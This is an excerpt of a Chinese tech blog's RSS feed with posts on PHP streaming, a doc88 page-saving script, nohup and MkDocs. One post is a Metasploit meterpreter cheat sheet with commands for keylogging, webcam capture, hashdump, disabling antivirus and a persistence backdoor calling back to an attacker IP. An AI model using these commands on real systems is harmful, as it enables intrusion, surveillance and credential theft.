&amp;nbsp;&amp;nbsp;}&lt;/pre&gt;&lt;p&gt;亲测gzip可以不用关闭。&lt;/p&gt;&lt;p&gt;3、Nginx情况下php代码开头必须加这一行&lt;/p&gt;&lt;pre class=&quot;brush:php;toolbar:false&quot;&gt;header(&amp;#39;X-Accel-Buffering:&amp;nbsp;no&amp;#39;);&lt;/pre&gt;&lt;p&gt;4、php相关测试代码&lt;/p&gt;&lt;pre class=&quot;brush:php;toolbar:false&quot;&gt;header(&amp;#39;X-Accel-Buffering:&amp;nbsp;no&amp;#39;);
$str&amp;nbsp;=&amp;nbsp;&amp;#39;我是AI人工智能语言模型。我可以回答问题、提供信息、进行对话等。有什么可以帮助你的吗？&amp;#39;;
$n&amp;nbsp;=&amp;nbsp;mb_strlen($str);
//&amp;nbsp;ob_end_clean();
for($i=0;&amp;nbsp;$i&amp;lt;$n;&amp;nbsp;$i++)&amp;nbsp;{
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;echo&amp;nbsp;mb_substr($str,&amp;nbsp;$i,&amp;nbsp;1);
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if(ob_get_level()&amp;gt;0)&amp;nbsp;ob_flush();flush();
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;//&amp;nbsp;0.1毫秒
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;usleep(100000);
}
//&amp;nbsp;ob_end_flush();&lt;/pre&gt;&lt;p&gt;&lt;br/&gt;&lt;/p&gt;</description><pubDate>Tue, 10 Dec 2024 11:15:03 +0800</pubDate></item><item><title>道客doc88文档下载方法</title><link>https://blog.ttcx.net/post/download-doc88.html</link><description>&lt;pre class=&quot;brush:js;toolbar:false&quot;&gt;function&amp;nbsp;downloadPages(pageNo)&amp;nbsp;{
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;for&amp;nbsp;(var&amp;nbsp;i=pageNo,n=pageNo&amp;nbsp;+&amp;nbsp;9;&amp;nbsp;i&amp;nbsp;&amp;lt;=&amp;nbsp;n;&amp;nbsp;i++)&amp;nbsp;{
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;const&amp;nbsp;pageCanvas&amp;nbsp;=&amp;nbsp;document.getElementById(&amp;#39;page_&amp;#39;&amp;nbsp;+&amp;nbsp;i);
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if&amp;nbsp;(pageCanvas&amp;nbsp;===&amp;nbsp;null)&amp;nbsp;break;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;const&amp;nbsp;pageNo&amp;nbsp;=&amp;nbsp;i;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;pageCanvas.toBlob(
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;blob&amp;nbsp;=&amp;gt;&amp;nbsp;{
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;const&amp;nbsp;anchor&amp;nbsp;=&amp;nbsp;document.createElement(&amp;#39;a&amp;#39;);
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;anchor.download&amp;nbsp;=&amp;nbsp;&amp;#39;page_&amp;#39;&amp;nbsp;+&amp;nbsp;pageNo&amp;nbsp;+&amp;nbsp;&amp;#39;.png&amp;#39;;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;anchor.href&amp;nbsp;=&amp;nbsp;URL.createObjectURL(blob);
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;anchor.click();
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;URL.revokeObjectURL(anchor.href);
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;}
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;);
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;}
}&lt;/pre&gt;&lt;pre class=&quot;brush:js;toolbar:false&quot;&gt;downloadPages(1)&lt;/pre&gt;&lt;p&gt;&lt;br/&gt;&lt;/p&gt;</description><pubDate>Mon, 14 Oct 2024 10:31:57 +0800</pubDate></item><item><title>msfconsole命令大全</title><link>https://blog.ttcx.net/post/msfconsole%E5%91%BD%E4%BB%A4%E5%A4%A7%E5%85%A8.html</link><description>&lt;p&gt;&lt;span style=&quot;font-size: 20px;&quot;&gt;&lt;strong&gt;1.基本命令&lt;/strong&gt;&lt;/span&gt;&lt;br/&gt;help # 查看Meterpreter帮助&lt;br/&gt;background# 返回，把meterpreter后台挂起&lt;br/&gt;bgkill# 杀死一个背景 meterpreter 脚本&lt;br/&gt;bglist#提供所有正在运行的后台脚本的列表&lt;br/&gt;bgrun#作为一个后台线程运行脚本&lt;br/&gt;channel#显示活动频道&lt;br/&gt;sessions -i number # 与会话进行交互，number表示第n个session,使用session -i 连接到指定序号的meterpreter会话已继续利用&lt;br/&gt;sesssions -k number #与会话进行交互&lt;br/&gt;close# 关闭通道&lt;br/&gt;exit# 终止 meterpreter 会话&lt;br/&gt;quit# 终止 meterpreter 会话&lt;br/&gt;interact id #切换进一个信道&lt;br/&gt;run#执行一个已有的模块，这里要说的是输入run后按两下tab，会列出所有的已有的脚本，常用的有autoroute,hashdump,arp_scanner,multi_meter_inject等&lt;br/&gt;irb# 进入 Ruby 脚本模式&lt;br/&gt;read# 从通道读取数据&lt;br/&gt;write# 将数据写入到一个通道&lt;br/&gt;run和bgrun# 前台和后台执行以后它选定的 meterpreter 脚本&lt;br/&gt;use# 加载 meterpreter 的扩展&lt;br/&gt;load/use#加载模块&lt;br/&gt;Resource#执行一个已有的rc脚本&lt;br/&gt;&lt;br/&gt;&lt;span style=&quot;font-size: 20px;&quot;&gt;&lt;strong&gt;2.文件常用命令&lt;/strong&gt;&lt;/span&gt;&lt;br/&gt;getwd 或者pwd # 查看当前工作目录&lt;br/&gt;ls #&lt;br/&gt;cd&lt;br/&gt;mkdir lltest1 #只能在当前目录下创建文件夹&lt;br/&gt;rmdir lltest1 #只能删除当前目录下文件夹&lt;br/&gt;getlwd 或者 lpwd #操作攻击者主机 查看当前目录&lt;br/&gt;lcd /tmp #操作攻击者主机 切换目录&lt;br/&gt;cat c:\lltest\lltpasswd.txt # 查看文件内容&lt;br/&gt;upload /home/hack.txt C:\lltest # 上传文件到目标机上&lt;br/&gt;download c:\lltest\lltpasswd.txt /tmp/ # 下载文件到本机上&lt;br/&gt;edit c:\10001.txt #编辑或创建文件 没有的话，会新建文件&lt;br/&gt;&lt;br/&gt;&lt;span style=&quot;font-size: 20px;&quot;&gt;&lt;strong&gt;3.系统命令&lt;/strong&gt;&lt;/span&gt;&lt;br/&gt;getsystem #会自动利用各种各样的系统漏洞来进行权限提升&lt;br/&gt;migrate #进程id进程迁移&lt;br/&gt;background #把当前的会话设置为背景，需要的时候在启用&lt;br/&gt;getuid #查看对方正在运行的用户&lt;br/&gt;ps #列出所有的进程&lt;br/&gt;getpid #返回运行meterpreter的id号&lt;br/&gt;sysinfo #产看系统信息和体系结构&lt;br/&gt;shell #切换到cmd的系统权限方式&lt;br/&gt;exit #退出shell会话返回meterpreter或终止meterpreter&lt;br/&gt;getdesktop 截取目标主机当前桌面会话窗口&lt;br/&gt;run webcam -p /var/www #在/var/www目录监控目标主机的摄像头&lt;br/&gt;keylog_recorder #使用migrate将会话迁移至explorer.exe的进程空间后记录键盘&lt;br/&gt;&lt;br/&gt;&lt;span style=&quot;font-size: 20px;&quot;&gt;&lt;strong&gt;4.远程桌面&amp;amp;截屏&lt;/strong&gt;&lt;/span&gt;&lt;br/&gt;run getgui -e #开启远程桌面&lt;br/&gt;run getgui -u user -p 123456 #添加用户&lt;br/&gt;run getgui -f 4444 –e #3389端口转发到6661&lt;br/&gt;enumdesktops #查看可用的桌面&lt;br/&gt;getdesktop #获取当前meterpreter 关联的桌面&lt;br/&gt;set_desktop #设置meterpreter关联的桌面 -h查看帮助&lt;br/&gt;screenshot #截屏&lt;br/&gt;use espia #或者使用espia模块截屏 然后输入screengrab&lt;br/&gt;run vnc #使用vnc远程桌面连接，这方法有点问题，上传了exe但是启动不了&lt;br/&gt;&lt;br/&gt;&lt;strong&gt;&lt;span style=&quot;font-size: 20px;&quot;&gt;5.键盘记录&lt;/span&gt;&lt;/strong&gt;&lt;br/&gt;keyscan_start #开始键盘记录&lt;br/&gt;keyscan_dump #导出记录数据&lt;br/&gt;keyscan_stop #结束键盘记录&lt;br/&gt;&lt;br/&gt;&lt;strong&gt;&lt;span style=&quot;font-size: 20px;&quot;&gt;6.关闭杀毒软件&lt;/span&gt;&lt;/strong&gt;&lt;br/&gt;run killav //可能导致目标机器蓝屏死机&lt;br/&gt;&lt;br/&gt;&lt;span style=&quot;font-size: 20px;&quot;&gt;&lt;strong&gt;7.后门植入&lt;/strong&gt;&lt;/span&gt;&lt;br/&gt;run persistence –h #查看帮助&lt;br/&gt;run persistence -X -i 5 -p 4444 -r 192.168.1.123&lt;br/&gt;#-X指定启动的方式为开机自启动；-i反向连接的时间间隔；–r 指定攻击者的ip&lt;/p&gt;</description><pubDate>Wed, 25 Oct 2023 15:00:31 +0800</pubDate></item><item><title>关闭putty后sh脚本无法在后台运行的解决办法</title><link>https://blog.ttcx.net/post/%E5%85%B3%E9%97%ADputty%E5%90%8Esh%E8%84%9A%E6%9C%AC%E6%97%A0%E6%B3%95%E5%9C%A8%E5%90%8E%E5%8F%B0%E8%BF%90%E8%A1%8C%E7%9A%84%E8%A7%A3%E5%86%B3%E5%8A%9E%E6%B3%95.html</link><description>&lt;p&gt;用putty连接centos，要执行一个sh脚本，正常用nohup直接运行命令，就可以在后台运行&lt;/p&gt;&lt;pre class=&quot;brush:bash;toolbar:false&quot;&gt;nohup&amp;nbsp;./1.sh&amp;nbsp;&amp;amp;&lt;/pre&gt;&lt;p&gt;但关闭putty后，发现脚本也停止了&lt;/p&gt;&lt;p&gt;&lt;br/&gt;问题出在，直接点putty的右上角X关闭按钮，nohup也会停止&lt;/p&gt;&lt;p&gt;&lt;br/&gt;解决方法1：直接在putty中输入exit退出即可&lt;/p&gt;&lt;p&gt;解决方法2：将系统输出重定向到正确位置&lt;/p&gt;&lt;pre class=&quot;brush:bash;toolbar:false&quot;&gt;nohup&amp;nbsp;./run.sh&amp;nbsp;&amp;gt;/dev/null&amp;nbsp;2&amp;gt;&amp;amp;1&amp;nbsp;&amp;amp;&lt;/pre&gt;&lt;pre class=&quot;brush:bash;toolbar:false&quot;&gt;nohup&amp;nbsp;sh&amp;nbsp;/www/run.sh&amp;nbsp;&amp;amp;&lt;/pre&gt;&lt;p&gt;&lt;br/&gt;&lt;/p&gt;</description><pubDate>Sat, 07 Oct 2023 09:00:13 +0800</pubDate></item><item><title>项目文档生成器MkDocs安装搭建</title><link>https://blog.ttcx.net/post/mkdocs.html</link><description>&lt;h2 id=&quot;mkdocs介绍&quot;&gt;&lt;strong&gt;MkDocs介绍&lt;/strong&gt;&lt;a class=&quot;headerlink localLink&quot; href=&quot;#mkdocs介绍&quot; title=&quot;Permanent link&quot;&gt;⚓︎&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;MkDocs是一个符合google material ui规范的静态文档网站生成器，使用markdown进行文档书写。其功能如下：
- python编写的markdown解释器、编译器，带有本地cli工具&lt;/p&gt;&lt;ul class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;p&gt;自带基于Tornado的小型http服务，用于本地调试&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;内置一键式发布至GitHub Pages&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;内置mkdocs风格、readthedocs风格的主题，并支持自定义主题&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;支持调用python模块实现语法及渲染的扩展&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;h2 id=&quot;环境及部署&quot;&gt;&lt;strong&gt;环境及部署&lt;/strong&gt;&lt;a class=&quot;headerlink localLink&quot; href=&quot;#环境及部署&quot; title=&quot;Permanent link&quot;&gt;⚓︎&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;测试环境在：python: 3以上，windows系统。（本教程也兼容Linux系统）&lt;/p&gt;&lt;h3 id=&quot;安装&quot;&gt;&lt;strong&gt;安装&lt;/strong&gt;&lt;a class=&quot;headerlink localLink&quot; href=&quot;#安装&quot; title=&quot;Permanent link&quot;&gt;⚓︎&lt;/a&gt;&lt;/h3&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre id=&quot;__code_1&quot; class=&quot;brush:python;toolbar:false;&quot;&gt;pip&amp;nbsp;install&amp;nbsp;mkdocs&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;br/&gt;&lt;/p&gt;&lt;details class=&quot;note&quot;&gt;&lt;summary&gt;若下载慢，可更换安装源为豆瓣&lt;/summary&gt;&lt;/details&gt;&lt;p&gt;&lt;br/&gt;&lt;/p&gt;&lt;h3 id=&quot;查看版本&quot;&gt;&lt;strong&gt;查看版本&lt;/strong&gt;&lt;a class=&quot;headerlink localLink&quot; href=&quot;#查看版本&quot; title=&quot;Permanent link&quot;&gt;⚓︎&lt;/a&gt;&lt;/h3&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre id=&quot;__code_3&quot; class=&quot;brush:python;toolbar:false;&quot;&gt;mkdocs&amp;nbsp;--version
mkdocs,&amp;nbsp;version&amp;nbsp;1.2.3&amp;nbsp;from&amp;nbsp;d:\ProgramData\Anaconda3\envs\py39\lib\site-packages\mkdocs&amp;nbsp;(Python&amp;nbsp;3.9)&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;或&lt;/p&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre id=&quot;__code_4&quot; class=&quot;brush:python;toolbar:false;&quot;&gt;pip&amp;nbsp;show&amp;nbsp;mkdocs&lt;/pre&gt;&lt;/div&gt;&lt;h3 id=&quot;查看帮助&quot;&gt;&lt;strong&gt;查看帮助&lt;/strong&gt;&lt;a class=&quot;headerlink localLink&quot; href=&quot;#查看帮助&quot; title=&quot;Permanent link&quot;&gt;⚓︎&lt;/a&gt;&lt;/h3&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre id=&quot;__code_5&quot; class=&quot;brush:python;toolbar:false;&quot;&gt;mkdocs&amp;nbsp;--help&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;或直接输入 &lt;code&gt;mkdocs&lt;/code&gt;, 输出如下：&lt;/p&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre id=&quot;__code_6&quot; class=&quot;brush:python;toolbar:false;&quot;&gt;Usage:&amp;nbsp;mkdocs&amp;nbsp;[OPTIONS]&amp;nbsp;COMMAND&amp;nbsp;[ARGS]...

&amp;nbsp;&amp;nbsp;MkDocs&amp;nbsp;-&amp;nbsp;Project&amp;nbsp;documentation&amp;nbsp;with&amp;nbsp;Markdown.

Options:
&amp;nbsp;&amp;nbsp;-V,&amp;nbsp;--version&amp;nbsp;&amp;nbsp;Show&amp;nbsp;the&amp;nbsp;version&amp;nbsp;and&amp;nbsp;exit.
&amp;nbsp;&amp;nbsp;-q,&amp;nbsp;--quiet&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Silence&amp;nbsp;warnings
&amp;nbsp;&amp;nbsp;-v,&amp;nbsp;--verbose&amp;nbsp;&amp;nbsp;Enable&amp;nbsp;verbose&amp;nbsp;output
&amp;nbsp;&amp;nbsp;-h,&amp;nbsp;--help&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Show&amp;nbsp;this&amp;nbsp;message&amp;nbsp;and&amp;nbsp;exit.

Commands:
&amp;nbsp;&amp;nbsp;build&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Build&amp;nbsp;the&amp;nbsp;MkDocs&amp;nbsp;documentation（构建MkDocs文档）
&amp;nbsp;&amp;nbsp;gh-deploy&amp;nbsp;&amp;nbsp;Deploy&amp;nbsp;your&amp;nbsp;documentation&amp;nbsp;to&amp;nbsp;GitHub&amp;nbsp;Pages&amp;nbsp;（部署到GitHub）
&amp;nbsp;&amp;nbsp;new&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Create&amp;nbsp;a&amp;nbsp;new&amp;nbsp;MkDocs&amp;nbsp;project&amp;nbsp;（创建一个新的项目）
&amp;nbsp;&amp;nbsp;serve&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Run&amp;nbsp;the&amp;nbsp;builtin&amp;nbsp;development&amp;nbsp;server&amp;nbsp;(启动一个内置的开发服务)&lt;/pre&gt;&lt;/div&gt;&lt;h3 id=&quot;升级&quot;&gt;&lt;strong&gt;升级&lt;/strong&gt;&lt;a class=&quot;headerlink localLink&quot; href=&quot;#升级&quot; title=&quot;Permanent link&quot;&gt;⚓︎&lt;/a&gt;&lt;/h3&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre id=&quot;__code_7&quot; class=&quot;brush:python;toolbar:false;&quot;&gt;pip&amp;nbsp;install&amp;nbsp;-U&amp;nbsp;mkdocs&lt;/pre&gt;&lt;/div&gt;&lt;h3 id=&quot;卸载&quot;&gt;&lt;strong&gt;卸载&lt;/strong&gt;&lt;a class=&quot;headerlink localLink&quot; href=&quot;#卸载&quot; title=&quot;Permanent link&quot;&gt;⚓︎&lt;/a&gt;&lt;/h3&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre id=&quot;__code_8&quot; class=&quot;brush:python;toolbar:false;&quot;&gt;pip&amp;nbsp;uninstall&amp;nbsp;&amp;nbsp;mkdocs&lt;/pre&gt;&lt;/div&gt;&lt;hr/&gt;&lt;h2 id=&quot;快速开始&quot;&gt;&lt;strong&gt;快速开始&lt;/strong&gt;&lt;a class=&quot;headerlink localLink&quot; href=&quot;#快速开始&quot; title=&quot;Permanent link&quot;&gt;⚓︎&lt;/a&gt;&lt;/h2&gt;&lt;h3 id=&quot;初始化项目&quot;&gt;&lt;strong&gt;初始化项目&lt;/strong&gt;&lt;a class=&quot;headerlink localLink&quot; href=&quot;#初始化项目&quot; title=&quot;Permanent link&quot;&gt;⚓︎&lt;/a&gt;&lt;/h3&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre id=&quot;__code_9&quot; class=&quot;brush:python;toolbar:false;&quot;&gt;#&amp;nbsp;这里项目名是my-projectmkdocs&amp;nbsp;new&amp;nbsp;my-project&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;在命令行窗口中执行完上面命令后，系统会生成&lt;code&gt;my-project&lt;/code&gt;目录，进入该目录里，可以看到默认放置了一些文件。如下：&lt;/p&gt;&lt;figure&gt;&lt;em&gt;&lt;img src=&quot;https://ai.aianaconda.com/tutorial/mkdocs/mkdocsbase/basedir.png&quot;/&gt;&lt;/em&gt;&lt;figcaption&gt;my-project目录&lt;/figcaption&gt;&lt;/figure&gt;&lt;p&gt;上图中的&lt;code&gt;docs&lt;/code&gt;是内容目录，用于管理文档的源文件以及图片的资源；
上图中&lt;code&gt;mkdocs.yml&lt;/code&gt;是配置文件，用于配置页面的目录结构以及主题等。&lt;/p&gt;&lt;p&gt;&lt;br/&gt;&lt;/p&gt;&lt;hr/&gt;&lt;h3 id=&quot;本地运行和调试&quot;&gt;&lt;strong&gt;本地运行和调试&lt;/strong&gt;&lt;a class=&quot;headerlink localLink&quot; href=&quot;#本地运行和调试&quot; title=&quot;Permanent link&quot;&gt;⚓︎&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;通过命令行，进入&lt;code&gt;my-project&lt;/code&gt;目录，执行命令 &lt;code&gt;mkdocs serve&lt;/code&gt;即可：&lt;/p&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre id=&quot;__code_10&quot; class=&quot;brush:python;toolbar:false;&quot;&gt;cd&amp;nbsp;my-project
mkdocs&amp;nbsp;serve
#mkdocs&amp;nbsp;serve&amp;nbsp;-a&amp;nbsp;0.0.0.0:8888&amp;nbsp;&amp;nbsp;可以绑定服务的ip和端口&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;命令执行后，在浏览器中输入网址：&lt;code&gt;http://127.0.0.1:8000/&lt;/code&gt;，便可以看到网站内容。&lt;/p&gt;&lt;figure&gt;&lt;img src=&quot;https://ai.aianaconda.com/tutorial/mkdocs/mkdocsbase/run.png&quot;/&gt;&lt;figcaption&gt;run&lt;/figcaption&gt;&lt;/figure&gt;&lt;details class=&quot;note&quot;&gt;&lt;summary&gt;&lt;code&gt;mkdocs serve&lt;/code&gt;命令仅为调试使用，不建议在生产环境下使用&lt;/summary&gt;&lt;/details&gt;&lt;p&gt;&lt;br/&gt;&lt;/p&gt;&lt;hr/&gt;&lt;h3 id=&quot;修改主题&quot;&gt;&lt;strong&gt;修改主题&lt;/strong&gt;&lt;a class=&quot;headerlink localLink&quot; href=&quot;#修改主题&quot; title=&quot;Permanent link&quot;&gt;⚓︎&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;MkDocs自带2个主题：mkdocs（默认）和readthedocs，通过修改&lt;code&gt;mkdocs.yml&lt;/code&gt;文件可以实现主题更换。
在&lt;code&gt;mkdocs.yml&lt;/code&gt;文件里添加:&lt;/p&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre id=&quot;__code_11&quot; class=&quot;brush:python;toolbar:false;&quot;&gt;theme:
&amp;nbsp;&amp;nbsp;name:&amp;nbsp;readthedocs&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;刷新浏览器，会看到如下页面：&lt;/p&gt;&lt;figure&gt;&lt;img src=&quot;https://ai.aianaconda.com/tutorial/mkdocs/mkdocsbase/readthedocs.png&quot;/&gt;&lt;figcaption&gt;readthedocs主题&lt;/figcaption&gt;&lt;/figure&gt;&lt;p&gt;除此之外，还可以为MkDocs添加更多的&lt;a href=&quot;https://github.com/mkdocs/mkdocs/wiki/MkDocs-Themes&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot; class=&quot; externalLink&quot;&gt;第三方主题&lt;/a&gt;,以及&lt;a href=&quot;https://mkdocs.zimoapps.com/user-guide/custom-themes/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot; class=&quot; externalLink&quot;&gt;自定义主题&lt;/a&gt;。&lt;/p&gt;&lt;p&gt;&lt;br/&gt;&lt;/p&gt;&lt;hr/&gt;&lt;h3 id=&quot;编译网站&quot;&gt;&lt;strong&gt;编译网站&lt;/strong&gt;&lt;a class=&quot;headerlink localLink&quot; href=&quot;#编译网站&quot; title=&quot;Permanent link&quot;&gt;⚓︎&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;在命令行中，进入&lt;code&gt;my-project&lt;/code&gt;目录，并执行命令 &lt;code&gt;mkdocs build&lt;/code&gt;即可对网站进行编译&lt;/p&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre id=&quot;__code_12&quot; class=&quot;brush:python;toolbar:false;&quot;&gt;#mkdocs&amp;nbsp;build&amp;nbsp;--clean&amp;nbsp;可以在构建时清理一些残留资源
mkdocs&amp;nbsp;build&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;编译后，系统会在&lt;code&gt;my-project&lt;/code&gt;目录下生成&lt;code&gt;site&lt;/code&gt;子目录。该目录中的内容就是MkDocs所生成的静态网站。&lt;/p&gt;&lt;figure&gt;&lt;img src=&quot;https://ai.aianaconda.com/tutorial/mkdocs/mkdocsbase/build.png&quot;/&gt;&lt;figcaption&gt;编译后的站点&lt;/figcaption&gt;&lt;/figure&gt;&lt;p&gt;&lt;br/&gt;&lt;/p&gt;&lt;p&gt;在生产环境下，可以通过远程桌面或命令行ftp，ssh或scp客户端等工具，将&lt;code&gt;site&lt;/code&gt;整个目录传到服务器上。
例如，以scp举例：&lt;/p&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre id=&quot;__code_13&quot; class=&quot;brush:python;toolbar:false;&quot;&gt;mkdocs&amp;nbsp;buildscp&amp;nbsp;-r&amp;nbsp;./site&amp;nbsp;user@host:/path/to/server/root#&amp;nbsp;其中“user”替换为登录服务提的用户名，“host”替换为主机的域名（ip）&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;待文件上传完成之后，可以通过Nginx、Tomcat等任意http服务器，将该网站发布出去。实现生产环境的部署。&lt;/p&gt;&lt;hr/&gt;&lt;h3 id=&quot;发布至github-pages&quot;&gt;&lt;strong&gt;发布至GitHub pages&lt;/strong&gt;&lt;a class=&quot;headerlink localLink&quot; href=&quot;#发布至github-pages&quot; title=&quot;Permanent link&quot;&gt;⚓︎&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;通过mkdocs gh-deploy自动编译出html并发布至GitHub pages&lt;/p&gt;&lt;ol class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;p&gt;在github上创建一个repo，名字叫my-project&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;将repo同步到本地&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;将mkdocs根目录(my-project)下的所有东西移到本地git目录下 (然后可以将mkdocs根目录删除了)&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;在本地git目录下执行如下命令，即可实现发布任务：&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre id=&quot;__code_14&quot; class=&quot;brush:python;toolbar:false;&quot;&gt;mkdocs&amp;nbsp;gh-deploy&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;还可以按照&lt;a href=&quot;https://www.cnblogs.com/frytea/p/13411434.html&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot; class=&quot; externalLink&quot;&gt;https://www.cnblogs.com/frytea/p/13411434.html&lt;/a&gt;的方法实现自动构建并上传到github。&lt;/p&gt;&lt;h2 id=&quot;错误处理&quot;&gt;&lt;strong&gt;错误处理&lt;/strong&gt;&lt;a class=&quot;headerlink localLink&quot; href=&quot;#错误处理&quot; title=&quot;Permanent link&quot;&gt;⚓︎&lt;/a&gt;&lt;/h2&gt;&lt;h3 id=&quot;启动时提示字符错误&quot;&gt;&lt;strong&gt;启动时提示字符错误&lt;/strong&gt;&lt;a class=&quot;headerlink localLink&quot; href=&quot;#启动时提示字符错误&quot; title=&quot;Permanent link&quot;&gt;⚓︎&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;在windows编写makedown文档后，执行&lt;code&gt;mkdocs serve&lt;/code&gt;命令后，有时会遇到字符集错误，例如：&lt;/p&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre id=&quot;__code_15&quot; class=&quot;brush:python;toolbar:false;&quot;&gt;UnicodeDecodeError:&amp;nbsp;&amp;#39;utf-8&amp;#39;&amp;nbsp;codec&amp;nbsp;can&amp;#39;t&amp;nbsp;decode&amp;nbsp;byte&amp;nbsp;0xc8&amp;nbsp;in&amp;nbsp;position&amp;nbsp;13:&amp;nbsp;invalid&amp;nbsp;continuation&amp;nbsp;byte&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;这种情况，只需要使用UltraEdit等工具将其另存为utf-8解码即可。&lt;/p&gt;&lt;figure&gt;&lt;img src=&quot;https://ai.aianaconda.com/tutorial/mkdocs/mkdocsbase/%E5%8F%A6%E5%AD%98%E5%9B%BE%E7%89%87.png&quot;/&gt;&lt;figcaption&gt;另存为utf-8解码&lt;/figcaption&gt;&lt;/figure&gt;&lt;p&gt;&lt;br/&gt;&lt;/p&gt;&lt;h3 id=&quot;端口占用&quot;&gt;&lt;strong&gt;端口占用&lt;/strong&gt;&lt;a class=&quot;headerlink localLink&quot; href=&quot;#端口占用&quot; title=&quot;Permanent link&quot;&gt;⚓︎&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;在windows编写makedown文档后，执行&lt;code&gt;mkdocs 